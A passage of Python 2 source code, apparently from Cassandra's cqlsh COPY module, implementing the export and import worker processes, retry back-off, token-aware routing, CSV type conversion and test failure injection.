self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
An child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
try:
self.inner_run()
finally:
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = unicode(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in self.hosts_to_sessions.values())
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect we report an error so that the token will
be retried again later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception, e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in self.hosts_to_sessions.keys():
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(map(self.format_value, row, cql_types))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception, e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
return formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
def close(self):
ChildProcess.close(self)
for session in self.hosts_to_sessions.values():
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. As far as I understood this is the easiest
way to find out the types of the partition columns, we will never use this prepared statement
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(select_query)
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value the can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
if v == self.nullval:
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
return bytearray.fromhex(v[2:])
def convert_text(v, **_):
return v
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == self.boolean_styles[0].lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slow and a fast integer conversion function depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slow and a fast decimal conversion function depending on self.thousands_sep and self.decimal_sep
"""
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, '').replace(self.decimal_sep, '.'))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, '.'))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split "val" into a list of values whenever the separator "sep" is found, but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. This method is called when parsing composite
types, "val" should be at least 2 characters long, the first char should be an
open parenthesis and the last char should be a matching closing parenthesis. We could also
check exactly which parenthesis type depending on the caller, but I don't want to enforce
too many checks that don't necessarily provide any additional benefits, and risk breaking
data that could previously be imported, even if strictly speaking it is incorrect CQL.
For example, right now we accept sets that start with '[' and ']', I don't want to break this
by enforcing '{' and '}' in a minor release.
"""
def is_open_paren(cc):
return cc == '{' or cc == '[' or cc == '('
def is_close_paren(cc):
return cc == '}' or cc == ']' or cc == ')'
def paren_match(c1, c2):
return (c1 == '{' and c2 == '}') or (c1 == '[' and c2 == ']') or (c1 == '(' and c2 == ')')
if len(val) < 2 or not paren_match(val[0], val[-1]):
raise ParseError('Invalid composite string, it should start and end with matching parentheses: {}'
.format(val))
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if is_open_paren(c):
level += 1
elif is_close_paren(c):
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile("(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" + # YYYY-MM-DD[( |'T')]
"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" + # [HH:MM[:SS[.NNNNNN]]]
"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/2/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1e3) + milliseconds
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
We need to pass to BoundStatement.bind() a dict() because it calls iteritems(),
except we can't create a dict with another dict as the key, hence we use a class
that adds iteritems to a frozen set of tuples (which is how dict are normally made
immutable in python).
"""
class ImmutableDict(frozenset):
iteritems = frozenset.__iter__
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split('{%s}' % vv, sep=':') for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
vals = [v for v in [split('{%s}' % vv, sep=':') for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=long),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=long),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls, this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else ("0" if self.is_counter else "NULL")
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check on the row length and
make sure primary partition key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception, e:
# if we could not convert an empty string, then self.nullval has been set to a marker
# because the user needs to import empty strings, except that the converters for some types
# will fail to convert an empty string, in this case the null value should be inserted
# see CASSANDRA-12794
if v == '':
return self.get_null_val()
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (val, e.message))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
l = len(val)
pk_values.append(struct.pack(">H%dsB" % l, l, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
# Note that refresh metadata is disabled by default and we currenlty do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return filter(lambda r: r.is_up is not False and r.datacenter == self.local_dc, shuffled) if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
exponential back-off if too many in flight requests to all replicas are already in progress.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in xrange(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
# the back-off starts at 10 ms (0.01) and it can go up to to 2^max_backoff_attempts,
# which is currently 12, so 2^12 = 4096 = ~40 seconds when dividing by 0.01
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper to the driver default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c.encode(self.encoding) for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.request_timeout = options.copy['requesttimeout']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
self._session = cluster.connect(self.ks)
self._session.default_timeout = self.request_timeout
return self._session
def run(self):
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
self.report_error(exc)
finally:
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
# do not handle else case, if a statement could not be created, the exception is handled
# in self.wrap_make_statement and the error is reported, if a failure is injected that
# causes the statement to be None, then we should not report the error so that we can test
# the parent process handling missing batches from child processes
except Exception, exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception, exc:
print "Failed to make batch statement: {}".format(exc)
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch, apply_failure = self.maybe_inject_failures(batch)
if apply_failure:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append("%s=%s" % (self.valid_columns[i], value))
else:
set_clause.append("%s=%s+%s" % (self.valid_columns[i], self.valid_columns[i], value))
full_query_text = query % (','.join(set_clause), ' AND '.join(where_clause))
statement.add(full_query_text)
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(False, query % (','.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception, err:
errors[err.message].append(r)
return None
converted_rows = filter(None, [convert_row(r) for r in rows])
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if the batch is a batch
supposed to cause a failure (failing_batch), or to terminate the worker process
(exit_batch), or not to be sent (unsent_batch).
@return any statement that will cause a failure or None if the statement should not be sent
plus a boolean indicating if a failure should be applied at all
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
